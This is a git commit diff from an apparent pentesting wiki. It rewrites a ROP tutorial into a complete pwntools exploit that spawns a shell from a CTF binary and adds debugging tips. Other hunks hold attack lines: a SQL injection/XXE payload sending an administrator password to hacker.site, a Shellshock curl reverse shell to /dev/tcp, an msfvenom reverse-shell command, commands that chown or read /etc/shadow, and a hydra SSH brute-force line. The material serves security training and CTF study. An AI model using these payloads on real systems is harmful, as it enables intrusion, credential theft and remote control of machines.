GitBook: [master] 19 pages and 4 assets modified

This commit is contained in:
CPol 2021-09-25 16:33:43 +00:00 committed by gitbook-bot
parent c59e78e9c2
commit 9d85603d35
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
21 changed files with 219 additions and 78 deletions

View file

Before

Width:  |  Height:  |  Size: 740 KiB

After

Width:  |  Height:  |  Size: 740 KiB

View file

Before

Width:  |  Height:  |  Size: 740 KiB

After

Width:  |  Height:  |  Size: 740 KiB

View file

@ -514,7 +514,7 @@
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md) * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md) * [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md) * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md) * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md) * [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)

View file

@ -27,12 +27,6 @@ Heap**
**Stack** **Stack**
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
**Sección BSS**: Variables globales o estáticas sin inicializar **Sección BSS**: Variables globales o estáticas sin inicializar
```text ```text
@ -51,19 +45,27 @@ int i = 5;
**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\) **Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
\*\*\*\*
Para obtener la dirección de una función dentro de un programa se puede hacer: Para obtener la dirección de una función dentro de un programa se puede hacer:
```text ```text
objdump -d ./PROGRAMA | grep FUNCION objdump -d ./PROGRAMA | grep FUNCION
``` ```
Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
* `unset env LINES`
* `unset env COLUMNS` ## ROP
* `set env _=path` donde path es la ruta absoluta al programa
* explotar el programa usando la ruta absoluta ### Call to sys\_execve
* asegúrate de que PWD y OLDPWD son las mismas que en gdb
{% page-ref page="rop-syscall-execv.md" %}
## **2.SHELLCODE** ## **2.SHELLCODE**

View file

@ -1,51 +1,164 @@
# ROP - Syscall execv # ROP - call sys\_execve
The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_ In order to prepare the call for the **syscall** it's needed the following configuration:
* **RDI**: Pointing to the string "/bin/bash" * `rax: 59 Specify sys_execve`
* **RSI**: Null * `rdi: ptr to "/bin/sh" specify file to execute`
* **RDX**: Null * `rsi: 0 specify no arguments passed`
* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv** * `rdx: 0 specify no environment variables passed`
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
## Control the registers
Let's start by finding **how to control those registers**:
```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
With these addresses it's possible to **write the content in the stack and load it into the registers**.
## Write string
### Writable memory
Frist you need to find a writable place in the memory
```bash ```bash
ROPgadget --binary vulnbinary | grep syscall gef> vmmap
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop [ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
``` ```
## Writing ### Write String
If you can somehow write to an address and then get the address of where you have written then this step is unnecessary. Then you need to find a way to write arbitrary content in this address
Elsewhere, you may search for some **write-what-where**. ```python
As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]` ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
### Finding a place to write
If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
```bash
objdump -x vulnbinary | grep ".bss" -B1
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000010 00403418 00403418 00002418 2**3
``` ```
In this case: **0x403418** #### 32 bits
### **Writing** _**"/bin/sh"**_ ```python
'''
Lets write "/bin/sh" to 0x6b6000
```text pop rdx, 0x2f62696e2f736800
buffer += address(pop_eax) # place value into EAX pop rax, 0x6b6000
buffer += "/bin" # 4 bytes at a time mov qword ptr [rax], rdx
buffer += address(pop_edx) # place value into edx '''
buffer += address(writable_memory)
buffer += address(writewhatwhere)
buffer += address(pop_eax) rop += popRdx # place value into EAX
buffer += "//sh" rop += "/bin" # 4 bytes at a time
buffer += address(pop_edx) rop += popRax # place value into edx
buffer += address(writable_memory + 4) rop += p32(0x6b6000) # Writable memory
buffer += address(writewhatwhere) rop += writeGadget #Address to: mov qword ptr [rax], rdx
rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
``` ```
#### 64 bits
```python
'''
Lets write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
## Example
```python
from pwn import *
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# Our syscall gadget
syscall = p64(0x40129c)
'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget
'''
Prep the four registers with their arguments, and make the syscall
pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0
syscall
'''
rop += popRax
rop += p64(0x3b)
rop += popRdi
rop += p64(0x6b6000)
rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)
rop += syscall
# Add the padding to the saved return address
payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)
target.interactive()
```
## References
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)

View file

@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
apt-get install gdb apt-get install gdb
``` ```
### Parameters: ### Parameters
**-q** --&gt; No show banner **-q** --&gt; No show banner
**-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here **-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp pattern search $rsp #Search the offset given the content of $rsp
``` ```
### Tricks
#### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
#### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
```text
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDB server ### GDB server
`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\) `gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)

View file

@ -744,7 +744,7 @@ And in order to read a file you could do:
print(open("/etc/shadow", "r").read()) print(open("/etc/shadow", "r").read())
``` ```
#### Example with _\*\*_Environment \(Docker breakout\) #### Example with \_\*\*\_Environment \(Docker breakout\)
You can check the enabled capabilities inside the docker container using: You can check the enabled capabilities inside the docker container using:
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
``` ```
Or with the **`ruby`** binary having this capability: Or with the **`ruby`** binary having this capability:
```bash ```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")' ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
``` ```

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)** * Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA** * **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png) ![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
### Step 6: Profile Installation ### Step 6: Profile Installation

View file

@ -5,7 +5,7 @@
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**. This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution. It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\). Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
## Main Applications ## Main Applications
@ -209,7 +209,6 @@ This can be mitigated with something like: _**sandbox= allow-scripts allow-to
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />` You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\) This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
### New &lt;portal HTML tag ### New &lt;portal HTML tag
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
## Brute-Force Detection List ## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %} {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
## References ## References
All the techniques presented here and more can view reviewed with more details in: All the techniques presented here and more can view reviewed with more details in:
{% embed url="http://lcamtuf.coredump.cx/postxss/" %} {% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
Another HTML tags that can be abused can be find here: Another HTML tags that can be abused can be find here:
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %} {% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
More info: More info:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %} {% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}

View file

@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:** **Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %} {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
Try also to change `/` for `\` Try also to change `/` for `\`
Try also to add `../../../../../` Try also to add `../../../../../`
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
Merging several lists I have created: Merging several lists I have created:
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %} {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
Try also to change `/` for `\` Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../` Try also to remove `C:/` and add `../../../../../`
@ -53,7 +53,7 @@ Check the LFI list of linux.
## Basic LFI and bypasses ## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\). All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
```text ```text
http://example.com/index.php?page=../../../etc/passwd http://example.com/index.php?page=../../../etc/passwd
@ -330,7 +330,7 @@ Other possible log paths:
/var/log/httpd/error_log /var/log/httpd/error_log
``` ```
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Via Email ### Via Email

View file

@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
``` ```
### Out of band data exfiltration via XXE ### Out of band data exfiltration via XXE
```sql ```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- - a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
``` ```

View file

@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name: Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
``` ```text
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200 220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all EHLO all
250-somedomain.com Hello [x.x.x.x] 250-somedomain.com Hello [x.x.x.x]

View file

@ -287,3 +287,4 @@ Entry_1:
Description: Need Username Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
``` ```

View file

@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**. You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
#### **Test** ### **Test**
Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them. Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
``` ```
#### **Curl \(reflected, blind and out-of-band\)** ### **Curl \(reflected, blind and out-of-band\)**
```bash ```bash
# Reflected # Reflected
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
``` ```
#### Exploit ### Exploit
```bash ```bash
#Bind Shell #Bind Shell